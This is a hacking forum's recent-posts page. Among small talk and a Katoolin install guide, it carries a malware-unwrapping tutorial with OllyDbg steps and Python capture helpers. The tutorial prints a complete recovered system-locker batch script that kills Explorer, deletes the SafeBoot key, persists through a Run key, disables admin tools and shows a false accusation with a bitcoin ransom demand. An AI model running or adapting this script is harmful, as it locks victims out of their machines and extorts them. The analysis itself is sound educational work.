Recent Posts

Pages: 1 ... 6 7 [8] 9 10
71
Tutorials / Re: How to install kali tool into debian distro
« Last post by dudiehack on February 05, 2016, 02:33:41 pm »
You wrote a tutorial showing us how to install a package in Linux?

No, I wrote a tutorial for the newbies who want to install some tools from Kali in Debian-based distros. I don't see any problem... chill, it isn't for PRO people :) You have many paths to get to Rome :)
72
Tutorials / Re: How to install kali tool into debian distro
« Last post by deltonos on February 05, 2016, 02:24:46 pm »
It's more "simple". On my VPS, I had installed Debian, updated & upgraded. After that, I changed its sources to the Kali ones. Again apt-get update && upgrade and done... simple way and no extra Python script :P
73
Tutorials / Re: How to install kali tool into debian distro
« Last post by 0pt1musPr1m3 on February 05, 2016, 02:20:36 pm »
You wrote a tutorial showing us how to install a package in Linux?
74
Tutorials / How to install kali tool into debian distro
« Last post by dudiehack on February 05, 2016, 02:16:02 pm »
Installing Katoolin
Katoolin is an auto installer in python.

To install Katoolin run the following commands.

Code: Bash
# apt-get install git
# git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin

Then make /usr/bin/katoolin executable by running the command below.

Code: Bash
# chmod +x /usr/bin/katoolin


Now you can run Katoolin as follows.

Code: Bash
# katoolin

And have fun

source : http://www.tecmint.com/install-kali-linux-tools-using-katoolin-on-ubuntu-debian/


75
Hardware / Re: Advice on laptop solely linux
« Last post by xKiller on February 05, 2016, 02:15:23 pm »
My brother has a Lenovo and he is very happy. His Lenovo has 6 GB RAM and the graphics card is dedicated.
76
Unwrapping Exe Converters

Sample

Please download the following sample.

Win32.b1t.zip

Caution! This is live malware!

The password is "infected" without quotes.

Introduction to Wrappers

This tutorial shows how to unwrap a wrapped file using OllyDbg. A wrapped file carries a script or another executable in its body, which it drops and runs on execution. Wrappers typically build exe files from batch scripts, Python scripts, jar files, AutoIt scripts and the like. They are a very mild form of obfuscation: the embedded script or executable is usually encoded or encrypted inside the resulting file, so a plain strings run does not reveal it, but the wrapper has to decode it and write it out before it can run, and that is where we catch it.

Wrappers usually drop the file into the TEMP folder, execute it and then delete it. The main difficulty is that the dropped file is normally gone before you can copy it. Three simple ways around this are listed below; in this case we will use OllyDbg to obtain the dropped file.

Method 1: Change the folder permissions

  • Right-Click the folder, click on Properties
  • Click on the Security tab
  • If the Security tab is not there, you need to go to the folder options and uncheck Use simple file sharing
  • In the Security tab click Add..
  • Enter Everyone into the object name box, click OK
  • Click on Advanced. Select Everyone, then click on the Edit button
  • Place a checkmark in the deny column for delete and delete subfolders and files.
  • Click OK until all Windows are closed.
Note: This does not always work, because some wrappers first create a temp file to unpack into, then delete that temp file and create a folder of the same name, which your deny entry does not cover.

Method 2: Use a file copy script

Save the following batch file, replace <filename> with the actual name of the temp file, and run the script before executing the sample. This only works if you know the name of the temp file in advance. If the sample uses a random name, you need another method to obtain the file.

Code: Text
@echo off
:loop
rem grab the dropped file as often as possible; errors from the copy are
rem silenced because the file does not exist yet most of the time
copy %TEMP%\<filename> . >nul 2>&1
goto loop

Method 3: Use a debugger

With a debugger such as OllyDbg, break at a point where all files have been created but not yet deleted, and copy them.
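An added example that generalises Method 2 (it is not code from the original post): a small Python poller that snapshots a folder and copies every file that appears afterwards, including files in newly created subfolders with random names (the case the note under Method 1 mentions), into a quarantine directory. The folder names, the poll interval and the simulated dropper in demo() are assumptions. Because it polls, it still races the dropper, so start it before running the sample and keep the interval short.

```python
"""Poll a drop folder and copy out every new file before the dropper deletes it.

Added example, not code from the original post.  It generalises Method 2: no
file name has to be known in advance, and files created in new, randomly named
subfolders are caught as well.  Folder names and the poll interval are
assumptions.  Polling still races the dropper, so start the watcher before the
sample and keep the interval short.
"""
import os
import shutil
import tempfile
import time


def snapshot(root):
    """Return {relative_path: (size, mtime)} for every file below root."""
    seen = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.stat(full)
            except OSError:
                continue  # vanished between listing and stat
            seen[os.path.relpath(full, root)] = (st.st_size, st.st_mtime)
    return seen


def copy_new_files(root, quarantine, known):
    """Copy files below root that are new or changed since `known` into quarantine.

    Updates `known` in place and returns the relative paths that were copied.
    """
    copied = []
    for rel, meta in snapshot(root).items():
        if known.get(rel) == meta:
            continue
        # flatten the path so files from different random subfolders cannot collide
        dst = os.path.join(quarantine, rel.replace(os.sep, "__"))
        try:
            shutil.copy2(os.path.join(root, rel), dst)
        except OSError:
            continue  # deleted before we got to it; try again on the next poll
        known[rel] = meta
        copied.append(rel)
    return copied


def watch(root, quarantine, interval=0.05, duration=None):
    """Poll `root` every `interval` seconds, for `duration` seconds (None = forever)."""
    os.makedirs(quarantine, exist_ok=True)
    known = snapshot(root)  # whatever is already there is not interesting
    deadline = None if duration is None else time.monotonic() + duration
    total = []
    while deadline is None or time.monotonic() < deadline:
        total.extend(copy_new_files(root, quarantine, known))
        time.sleep(interval)
    return total


def demo():
    """Simulate a dropper writing a batch file into a random TEMP subfolder (constructed data)."""
    root, quarantine = tempfile.mkdtemp(), tempfile.mkdtemp()
    known = snapshot(root)
    sub = os.path.join(root, "rnd1234.tmp")  # assumed random folder name
    os.makedirs(sub)
    with open(os.path.join(sub, "x.bat"), "w", newline="") as f:
        f.write("@echo off\r\necho dropped\r\n")
    copied = copy_new_files(root, quarantine, known)
    os.remove(os.path.join(sub, "x.bat"))  # the dropper deletes its script...
    with open(os.path.join(quarantine, "rnd1234.tmp__x.bat"), newline="") as f:
        saved = f.read()  # ...but we already hold a copy
    return {
        "copied": [p.replace(os.sep, "/") for p in copied],
        "saved": saved,
        "second_poll": copy_new_files(root, quarantine, known),
    }


if __name__ == "__main__":
    import sys
    temp = os.environ.get("TEMP", "/tmp")
    out = sys.argv[1] if len(sys.argv) > 1 else "captured"
    print("watching", temp, "-> copying new files into", out)
    watch(temp, out)
```

Run it as `python watcher.py captured` in the lab VM before executing the sample; everything that shows up under TEMP, whatever it is called, ends up in `captured/` with the subfolder name folded into the file name. A real dropper can still write and delete a file inside one poll interval, which is exactly why the debugger method below is the reliable one.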

Analysis

Take a look at the executable in a hex editor first. Two things suggest that this is a wrapped file:

1. Antivirus detections list BAT as the platform.
2. Plaintext in the executable points to a b2e (Bat To Exe) converter.

That plaintext part looks as follows (the strings are NUL-separated in the file; the hex editor's text column shows them run together):

Code: Text
Overwrite? An unknown error occured. The program will be terminated. \ B D F I b2eincfilepath N O P S X open b2eargs Continue? extd b2etempfile b2eincfile @shift /0 Password Choose a location to save the files. -b2epass b2eprogramshortname Please enter the password. Error! b2eincfilecount The file
 This program is not supported on your operating system. b2eprogramfilename Can not create some of your include files. b2eprogramname @call:extd Can not allocate the memory. OK b2eprogrampathname b2eextd Wrong password. extd.exe

   already exists in the current directory. Overwrite?              :extd
   @set result=
   @%b2eextd% "%~1" "%~2" "%~3" "%~4" "%~5" "%~6" "%~7" "%~8" "%~9" > "%b2etempfile%"
   @set /p result= < "%b2etempfile%"
   @del "%b2etempfile%"
   @goto:eof

This is batch code, but it is only the wrapper's own helper (the :extd routine that runs the bundled extd.exe and reads its output back through %b2etempfile%); it is not the batch script we want.

Now run the sample in your lab VM. You will soon notice that Windows Explorer disappears, the desktop stops working, and any attempt to open Task Manager or the command prompt fails.



If you restart the machine, you get the same situation after logging in. This is typical behaviour for a system locker, but there is no ransom message. It also makes it harder to obtain the batch script. If you still have Process Explorer open, you can kill the process that keeps terminating Explorer. You will also observe that a batch file is created in a randomly named subfolder of TEMP, but it is gone soon after execution.

Unwrapping

Now start on a fresh VM and open the sample in OllyDbg. Create a snapshot before you start debugging. Olly will break as usual at the entry point of the executable.



Now think about it: what does the sample do before it runs the batch file?
It writes the file to TEMP. So we can set a breakpoint on WriteFile to halt before the TEMP file is written (in OllyDbg: Ctrl+G, enter WriteFile, then F2 on the first instruction). Do that and press F9 to continue execution. If the breakpoint never hits, the wrapper may be writing the file through a different API; a second breakpoint on CreateFileA/CreateFileW shows you which path it opens.

OllyDbg will break in this area within kernel32:



Take a look at the registers. You can clearly see that a reference to the batch string is in the EDX register. Which register happens to hold it is incidental; what is guaranteed at the entry of WriteFile is the argument list on the stack: [ESP+4] is the file handle, [ESP+8] is the buffer pointer (lpBuffer) and [ESP+C] is the number of bytes to write, so the buffer can always be located from the stack window even if no register points at it.



Right-click the address and choose Follow in Dump.



The batch string will appear in the dump window and it seems to be complete.



This is a good point in time to create a dump of the process. I used Process Explorer in this case (right-click the process, Create Dump, Create Full Dump); take a full dump rather than a minidump so that the heap holding the script is included.



Now open the dumped memory in a hex editor and search for the beginning of the batch file; I searched for "echo off" in ASCII.



Copy and paste the batch file string into a new file. Et voilà, you have the complete batch script! Now comes the most interesting part: open the script in a text editor such as Notepad++ and analyse the code.
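The two manual steps above, the b2e string check in the hex editor and the search-and-copy in the process dump, as one added Python script that is not from the original post or from the converter's author. The marker strings are the ones visible in the plaintext shown earlier; the carving rule (a run of printable ASCII that begins with "@shift /0" or "echo off" and ends at the first non-printable byte) is an assumption about how the dropped script sits in memory, and SAMPLE_DUMP is constructed, not a real dump.

```python
"""Triage a suspected b2e (Bat To Exe) wrapper and carve the batch script out of a
process dump.

Added example, not code from the original post or from the converter.  The
marker strings come from the plaintext seen in the hex editor; the carving rule
is an assumption about how the dropped script lies in memory; the sample dump is
constructed.
"""
import re

# Strings the wrapper stub carries in the clear (NUL-separated in the binary).
B2E_MARKERS = [b"b2eincfilepath", b"b2eprogramname", b"b2etempfile",
               b"b2eextd", b"@call:extd", b"extd.exe"]

# Batch scripts produced by this converter begin with one of these.
SCRIPT_STARTS = [b"@shift /0", b"@echo off", b"echo off"]

# A script is a run of printable ASCII (plus tab, CR, LF); anything else ends it.
_PRINTABLE_RUN = re.compile(rb"[\t\r\n\x20-\x7e]+")


def b2e_markers_found(data):
    """Return the b2e marker strings present in `data` (bytes of a file or dump)."""
    return [m.decode() for m in B2E_MARKERS if m in data]


def carve_batch_scripts(data, min_len=40):
    """Return [(offset, text)] for every printable run that looks like a batch script.

    `min_len` drops the converter's own short string-table entries: the stub's
    string table contains a bare '@shift /0', which is not the script.
    """
    found = []
    for m in _PRINTABLE_RUN.finditer(data):
        run = m.group()
        hits = [i for i in (run.find(s) for s in SCRIPT_STARTS) if i != -1]
        if not hits:
            continue
        idx = min(hits)  # earliest start marker inside this run
        text = run[idx:].decode("ascii")
        if len(text) >= min_len:
            found.append((m.start() + idx, text))
    return found


# Constructed stand-in for a process dump: a few stub strings, some binary noise,
# then the dropped script (the first lines of the script recovered above).
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"b2eincfilepath\x00b2etempfile\x00@shift /0\x00Password\x00extd.exe\x00"
    + b"\x01\x02\x03"
    + b"@shift /0\r\n@echo off\r\ncolor c\r\ntaskkill /im explorer.exe /f > nul\r\n"
      b"echo Enter C0d3:\r\n:upo\r\nset /p x=\r\ngoto upo\r\n"
    + b"\x00\xff\xfe"
)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    print("b2e markers:", b2e_markers_found(data))
    for n, (off, text) in enumerate(carve_batch_scripts(data)):
        name = f"carved_{n}_{off:08x}.bat"
        with open(name, "w", newline="") as f:  # keep the script's CRLF line endings
            f.write(text)
        print(f"wrote {name}: {len(text)} bytes from offset {off:#x}")
```

Run it as `python carve_b2e.py sample.exe` for the triage step and `python carve_b2e.py process.dmp` for the dump; each carved script is written out with its original line endings so that what you analyse is byte-for-byte what the wrapper wrote to TEMP. Because the script is plain text in memory, a single non-printable byte ends the run; if a carved file looks cut short, lower the threshold or look for the continuation at the next hit.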

Code: Text
@shift /0
@echo off
color c
taskkill /im explorer.exe /f > nul
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
copy %0 C:\Windows\Win32.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
cls
title Windows blocked, file encrypt
echo Windows Blocked!
echo Hello, we inform you that your system
has been blocked and all the files are
encrypted for viewing child porn.
You can unlock the system,
for this you need to pay 0.5 BTC 1G2GAivmaBkTephZsorQsyGFNNdBs3bWMB
in the wallet Bitcoin application is written in your email address to which you will
be sent the code to unlock it.
echo Enter C0d3:
:upo
set /p x=
if %x%==123456789 (echo Windows start!
start explorer
reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
exit
) ELSE (
cls
echo ERROR!
echo Enter C0d3:
)
goto upo

This looks like a complete fail, doesn't it?
It is indeed a system-locker ransomware, but the victim never sees a ransom note, because the command prompt is disabled and the ransom message is only shown in the command prompt! Note also that the message lines after the first echo are not echo commands at all, so cmd would try to execute "has", "encrypted", "You" and so on as commands. When you reproduce this, check the policy value it sets: DisableCMD=2 blocks interactive command prompts but still allows batch files to run; it is DisableCMD=1 that also stops batch scripts.

Your task: imagine a friend of yours got his or her system infected by this system locker. How would you restore the system?
77
Hardware / Re: Advice on laptop solely linux
« Last post by dimi on February 05, 2016, 07:12:35 am »
Thank you for the input guys. I was also leaning toward Lenovo. The X201 has a similar size to the HP I currently own.

I think I'll go for the T. Now I have to decide which one. Apparently the Ts has some heating issues due to its smaller size.

I will upgrade it to 8 GB. The upgrade is not so expensive.

Thank you for the advice!
78
Hacking and Security / Re: Cyber Security
« Last post by mmhackz on February 05, 2016, 06:51:22 am »
WTF!!! Why would I be doing advertisement? I just found something useful, that's why I have shared the file... If you are interested, download it, and if not then don't download it.
79
General discussion / Re: Where are you from?
« Last post by z!3db on February 05, 2016, 04:11:47 am »
I'm from Tunisia

Sent from my SM-G355H using Tapatalk

80
Scripting Languages / Re: Python Projects
« Last post by TheCrazyPasta on February 05, 2016, 02:01:23 am »
Not sure how far your knowledge extends with Python. I found the book "Learn Python the Hard Way" a great tool... every page is an exercise and gets you thinking. I wrote some simple things off ideas from the exercises. Good luck!